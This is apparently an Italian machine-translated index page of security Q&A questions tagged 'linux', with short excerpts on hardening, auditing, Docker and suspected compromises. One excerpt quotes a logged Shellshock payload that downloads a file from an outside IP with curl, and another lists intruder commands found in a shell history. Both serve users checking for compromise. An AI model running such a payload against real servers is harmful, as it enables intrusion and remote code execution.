Le migliori linux

2

risposte

Verifica delle vulnerabilità hardware (come Intel Management Engine) semiautomatizzata?

C'è un bel modo semi-automatico che vorrei semplicemente incollare l'output del mio /proc , lspci , o qualsiasi altra descrizione dell'hardware e ottenere suggerimenti su quale tipo di vulnerabilità a cui un determinato computer può esse...

posta 18.12.2017 - 20:58

1

risposta

I registri di Apache mostrano l'esecuzione dei comandi

Mi chiedo se il mio server è compromesso o meno. Ho appena guardato il mio log e ho visto la seguente riga: IP: 173.249.4.160, Date: 27-12-17, Time:09:52:51, Browser: () { :;}; /bin/bash -c "curl -o /tmp/zmuie http://162.243.117.130/zmuie;/u...

posta 28.12.2017 - 20:24

1

risposta

La registrazione di audit relativa a SELinux? [chiuso]

C'è qualche relazione tra auditd e SELinux? Oppure possiamo usare auditd anche se SELinux è disabilitato?

posta 05.09.2018 - 09:58

3

risposte

Quanto è utile impedire alle applicazioni Linux di configurare connessioni non affidabili e può essere fatto facilmente?

Minaccia: la tua macchina Linux viene compromessa in qualche modo (app non sicura, pacchetto di installazione o aggiornamento compromesso, o un'app viene compromessa a causa di una vulnerabilità, ecc.) e qualcosa sul tuo sistema cerca di "chiama...

posta 16.09.2018 - 15:32

1

risposta

Differenza tra Lynis e Nessus e ancora un altro strumento di indurimento

Sto scrivendo uno strumento python open source finalizzato all'inventoring / auditing e hardening di un sistema. Quando ho iniziato il progetto, ho fatto qualche ricerca intorno a questo e ho capito che non c'erano molti strumenti (almeno open s...

posta 15.05.2017 - 13:20

1

risposta

Kernel x86 Stack Overflow a 32 bit - sovrascrittura EIP segfaults in __kernel_vsyscall + 9 [closed]

Perché segfaults in __kernel_vsyscall + 9? È stata effettuata un'ispezione di EIP, interrotta subito dopo fwrite (), riga 93 in exp.c (gdb) x/10x 0xb7fd9ce5 0xb7fd9ce5 <__kernel_vsyscall+9>: 0xc3595a5d 0x90909090 0x5800768d 0x00...

posta 09.10.2017 - 15:23

1

risposta

Possibile vulnerabilità di sicurezza?

Su un pentest su una macchina interna nella mia rete aziendale che una macchina Linux (Debian) aveva collegamenti simbolici nella cartella var / www nella directory / etc /. Un'ulteriore enumerazione ha mostrato che c'era uno script bash che sup...

posta 28.08.2017 - 20:15

1

risposta

Possiamo sapere che cosa ha fatto finora l'hacker nel suo tentativo?

Ho scoperto "accidentalmente" durante la ricerca nella mia cronologia dei comandi, che qualcuno ha pubblicato questi: passwd w cat /proc/cpuinfo free -m uptime w perl v.py python v.py chmod +x * ./a 94.10 e questi: ./a 52.30 rm -rf scan.l...

posta 07.04.2018 - 13:54

2

risposte

Modo molto veloce ed efficiente per verificare che i contenuti della directory non siano stati modificati

Ho bisogno di un modo per determinare se i contenuti di una cartella contenente alcuni elementi eseguibili non sono stati modificati in alcun modo un momento prima che decida di eseguire ciò che è contenuto. Controlla ogni volta prima di eseguir...

posta 09.07.2016 - 03:15

3

risposte

È buona prassi eseguire il proxy delle applicazioni Web dai contenitori Docker?

L'impostazione corrente è la seguente: Un server di produzione (host) ha solo poche porte aperte, ovvero HTTP, HTTPS e porte sicure per l'invio di e-mail. Sull'host è presente un utente non privilegiato che esegue un motore e contenitori D...

posta 24.01.2017 - 18:13

Domande con tag 'linux'